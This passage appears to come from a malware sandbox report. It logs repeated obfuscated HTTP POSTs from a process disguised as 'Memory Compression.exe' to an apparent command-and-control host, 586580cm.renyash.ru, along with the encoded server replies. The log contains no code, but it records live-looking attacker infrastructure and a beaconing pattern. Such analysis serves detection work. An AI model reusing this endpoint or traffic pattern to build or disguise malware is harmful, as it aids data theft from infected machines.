                                                                                                                                Jan 11, 2025 15:02:39.118412018 CET1060OUTData Raw: 5a 55 5d 5d 5f 52 5d 53 5c 5f 50 57 54 50 59 5e 59 53 5b 5a 57 53 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZU]]_R]S\_PWTPY^YS[ZWST[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!%V<?T4Z#!:[0%=9:>;'!:>U%?(@("<).^''P*1
                                                                                                                                Jan 11, 2025 15:02:39.240072012 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:39.493933916 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:39 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d4HbKrSec6DwnxXhrNXJjOpuxXOHVXmLahrJp2hEHBq6gxEAgXoRHxM8wCXTxWaDbDBI6fmE3xPrRDBO%2BWbhJ43%2BSDhMn5LRCtW%2Brh8RJHXz3wowcw6AwtjWXIfAotojzgUAoDiT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005721afe3c435b-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=22911&min_rtt=20118&rtt_var=13131&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=34381&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                10192.168.2.549802104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:39.991230011 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:40.391906977 CET1060OUTData Raw: 5a 54 5d 5a 5a 58 58 5d 5c 5f 50 57 54 5d 59 5c 59 5c 5b 58 57 56 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZT]ZZXX]\_PWT]Y\Y\[XWVT][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!X' 4?!+7W&$%3>Z*(8U#_"$)*6647V>.^''P*
                                                                                                                                Jan 11, 2025 15:02:40.434377909 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:40.712829113 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:40 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V6C4IdBrjLpFYy%2FO1hOUwKX1T8DJY4V0PbVs7tZTz3KxG%2BDYzyBLiZmkUAVXnXSCH8oCuZoW7%2FvHTSRHAhNm1rn8xHM4B7Jz7e6mADM%2BW92IX7p54UCIi5lE%2BL6wzih9Hbe4lQ0%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572227d3c4240-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3579&min_rtt=1615&rtt_var=4535&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=84227&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                11192.168.2.549807104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:41.150204897 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:41.502340078 CET1060OUTData Raw: 5a 50 58 5a 5a 5f 5d 54 5c 5f 50 57 54 56 59 53 59 52 5b 51 57 55 54 58 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZPXZZ_]T\_PWTVYSYR[QWUTX[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"1<Y<2,_ &54\=)))$4:50?-(@?_ $;S)+.^''P*)
                                                                                                                                Jan 11, 2025 15:02:41.610270977 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:41.860681057 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:41 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JRyYR0OPNhiIOjmO0iozyZfp9L7Se%2B8CRyC%2F0%2FnqN5CWcZPBrivTsHE5ZBjiIvzeIofNSDCwIe2JpGsSqqmW8GAppJRoe03KbGkMViZtrQz5W9NtqNqIyx15%2BAMvAUf%2Bx9YGsjLO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057229cf690c7c-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3408&min_rtt=1689&rtt_var=4071&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=94547&cwnd=75&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                12192.168.2.549808104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:41.166687012 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1776
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:41.517494917 CET1776OUTData Raw: 5a 50 5d 5a 5f 5a 58 50 5c 5f 50 57 54 56 59 5a 59 57 5b 5b 57 50 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZP]Z_ZXP\_PWTVYZYW[[WPT\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"%>14#0=:6=;0T49'?"*6?!$4*+.^''P*)
                                                                                                                                Jan 11, 2025 15:02:41.629481077 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:41.928787947 CET961INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:41 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mpBgvwCkcuih13jHznkC3p89qEiA5UeRt%2Bq7ikCX67ooVqCiFDiY%2B0kbDaMtBpQO9ZAN%2B2dxOzya%2Fsd9iSXpj%2B%2BSwPWjkAPovVAoauYBwon%2BAAg%2BEn99F31RM4lccfJ5uKV7PAsf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057229ef188c69-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3468&min_rtt=1966&rtt_var=3741&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2086&delivery_rate=104405&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 27 16 23 2e 31 0f 36 02 35 0a 28 21 23 5b 30 0e 29 5b 2a 1c 04 5c 31 3b 34 1e 2e 5e 34 14 22 03 38 59 25 3e 31 5c 33 58 36 55 3f 3b 2c 5d 00 10 23 45 24 0d 25 10 3a 1c 08 09 3e 1f 02 0a 34 3c 20 05 26 2b 31 09 23 0a 20 05 23 04 3a 02 2c 0f 20 09 2e 34 29 06 2e 16 33 01 23 1f 2b 55 00 14 23 09 31 17 3c 13 29 0a 3c 56 20 38 2d 03 33 15 34 52 3f 3c 28 56 3d 28 21 52 3f 12 29 0e 34 3f 32 06 3d 0a 2c 45 27 32 25 50 31 06 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98'#.165(!#[0)[*\1;4.^4"8Y%>1\3X6U?;,]#E$%:>4< &+1# #:, .4).3#+U#1<)<V 8-34R?<(V=(!R?)4?2=,E'2%P1!_#.T?WT0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                13192.168.2.549812104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:42.219115019 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1048
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:02:42.565023899 CET1048OUTData Raw: 5a 53 5d 5c 5f 5c 58 55 5c 5f 50 57 54 55 59 5b 59 53 5b 5d 57 57 54 5f 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZS]\_\XU\_PWTUY[YS[]WWT_[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!_&,^<2]416\'*))( 7:U0,>?/X '(;.^''P*
                                                                                                                                Jan 11, 2025 15:02:42.666143894 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:42.937899113 CET799INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:42 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n2gCzFrv6JnfcYBM0XnyGp4XZqQjG5d9BOqDsCrsXT44P%2FnsrmeeAZZdbEj5epETVmZYxFdUNL5x2arAZI2wwHnXJijPAsuxJtV0vE1f%2BRV4LnV01T20wy9S9C6Q6bKi2ZDuCWbR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572306ebf728d-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4276&min_rtt=1898&rtt_var=5469&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1334&delivery_rate=69766&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                14192.168.2.549824104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:43.531637907 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:43.877500057 CET1060OUTData Raw: 5f 50 5d 5f 5f 59 58 51 5c 5f 50 57 54 56 59 5b 59 54 5b 5a 57 51 54 5e 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _P]__YXQ\_PWTVY[YT[ZWQT^[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"' $X( Z#!-$5?)"><4:*0<2W+664$*.^''P*)
                                                                                                                                Jan 11, 2025 15:02:44.006306887 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:44.276078939 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:44 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dm%2BhClVhfIiWbLXrZpVXZNWo4BI%2FsdO0FAcwXi%2B94W2g1iGONDTg%2BCb263Jd33cpoB914sNssarh8XRDIgmXE7J0spWEZBjOoghxqQYUfpHk3rT8x8BWyKDmNX5dw23LPz6vX69O"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057238cfb742cc-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3095&min_rtt=1764&rtt_var=3324&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=117609&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                15192.168.2.549835104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:45.489975929 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:45.845597982 CET1060OUTData Raw: 5a 53 5d 5e 5a 5f 5d 54 5c 5f 50 57 54 52 59 59 59 51 5b 5a 57 53 54 50 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZS]^Z_]T\_PWTRYYYQ[ZWSTP[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!Y&0+1'4:$5,Y)5*$Q7.3>S*%;X6<>;.^''P*
                                                                                                                                Jan 11, 2025 15:02:45.933794975 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:46.191062927 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:46 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kIl7SyOG1g%2Fmeb%2BQPcBdRRmhzl37SepPdMgrEtVGCwz5sO9BFtKRNPrWmG8iV7YCipPmxF%2FQbMePNHhjJqLNaupnyZk0z1LoArr5%2BPshu9xgXIH4D4s9LwQrEp960Irzl9KfUWgl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057244d9c518b8-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1980&min_rtt=1509&rtt_var=1509&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=276358&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                16192.168.2.549841104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:46.557831049 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:46.908202887 CET1060OUTData Raw: 5a 55 5d 58 5a 5b 5d 54 5c 5f 50 57 54 5d 59 5c 59 5c 5b 5c 57 5f 54 50 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZU]XZ[]T\_PWT]Y\Y\[\W_TP[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"%V(?(^!1"[0 Y=)*];4*5$?:+%;X5$+T>;.^''P*
                                                                                                                                Jan 11, 2025 15:02:47.024224043 CET25INHTTP/1.1 100 Continue


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                17192.168.2.549844104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:47.070542097 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1740
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:47.439502954 CET1740OUTData Raw: 5a 57 5d 54 5f 52 5d 53 5c 5f 50 57 54 55 59 5d 59 55 5b 5d 57 5f 54 51 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZW]T_R]S\_PWTUY]YU[]W_TQ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!2 (T<]7&_0;>)!*+4U3S?7 7*;.^''P*=
                                                                                                                                Jan 11, 2025 15:02:47.534050941 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:47.819418907 CET953INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:47 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wWgDsecr0x62hrTeTZAKsP%2B2fxuAMxIcoF9UFGcM2R2G4FW9y%2FtHNnKidSmxQbINa05omeX7HLwnM12w6UT%2B96cXfoChhJ0ZUoCI1NNiLKNWLS2nmXlhl1QS8NDtnq4FBwQBE%2FBs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005724ecbd641f3-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2583&min_rtt=2469&rtt_var=1155&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2050&delivery_rate=431187&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 27 14 23 3d 22 50 35 05 21 0b 2a 1f 0d 5b 25 33 3e 00 2a 0c 29 04 27 2b 23 04 2e 16 2b 0a 21 03 2c 5b 30 3d 22 07 25 3e 36 1d 3c 3b 2c 5d 00 10 23 09 24 33 25 59 2e 54 31 56 3d 22 2f 1b 23 02 2b 19 24 01 39 09 20 0d 02 04 23 2e 21 5d 2f 1f 0d 56 2d 1d 3d 07 2f 38 2b 04 23 25 2b 55 00 14 20 51 26 17 34 5b 2a 0d 2b 0f 20 01 21 02 27 02 2c 1e 29 3f 27 0f 2a 16 39 57 2b 12 3a 14 37 06 2d 12 29 23 02 42 24 32 22 09 25 2c 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98'#="P5!*[%3>*)'+#.+!,[0="%>6<;,]#$3%Y.T1V="/#+$9 #.!]/V-=/8+#%+U Q&4[*+ !',)?'*9W+:7-)#B$2"%,!_#.T?WT0
                                                                                                                                Jan 11, 2025 15:02:47.902178049 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:02:48.000560999 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:48.000792980 CET1060OUTData Raw: 5f 5f 5d 5f 5a 5c 58 57 5c 5f 50 57 54 56 59 5d 59 57 5b 5d 57 54 54 5f 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
